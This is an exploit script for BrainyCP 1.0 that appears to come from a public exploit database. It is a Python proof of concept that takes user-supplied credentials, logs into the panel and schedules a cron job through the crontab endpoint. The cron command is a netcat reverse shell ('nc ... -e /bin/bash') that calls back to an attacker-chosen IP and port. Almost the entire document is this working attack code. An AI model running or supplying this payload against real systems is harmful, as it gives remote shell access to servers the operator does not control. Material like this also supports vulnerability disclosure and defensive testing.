BrainyCP version 1.0 suffers from a remote code execution vulnerability.
# Exploit Title: BrainyCP V1.0 - Remote Code Execution
# Date: 2023-04-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://brainycp.io
# Demo: https://demo.brainycp.io
# Tested on: Kali Linux
# CVE : N/A
import requests
# credentials
url = input("URL: ")
username = input("Username: ")
password = input("Password: ")
ip = input("IP: ")
port = input("Port: ")
# login
session = requests.Session()
login_url = f"{url}/auth.php"
login_data = {"login": username, "password": password, "lan": "/"}
response = session.post(login_url, data=login_data)
if "Sign In" in response.text:
print("[-] Wrong credentials or may the system patched.")
exit()
# reverse shell
reverse_shell = f"nc {ip} {port} -e /bin/bash"
# request
add_cron_url = f"{url}/index.php?do=crontab&subdo=ajax&subaction=addcron"
add_cron_data = {
"cron_freq_minutes": "*",
"cron_freq_minutes_own": "",
"cron_freq_hours": "*",
"cron_freq_hours_own": "",
"cron_freq_days": "*",
"cron_freq_days_own": "",
"cron_freq_months": "*",
"cron_freq_weekdays": "*",
"cron_command": reverse_shell,
"cron_user": username,
}
response = session.post(add_cron_url, data=add_cron_data)
print("[+] Check your listener!")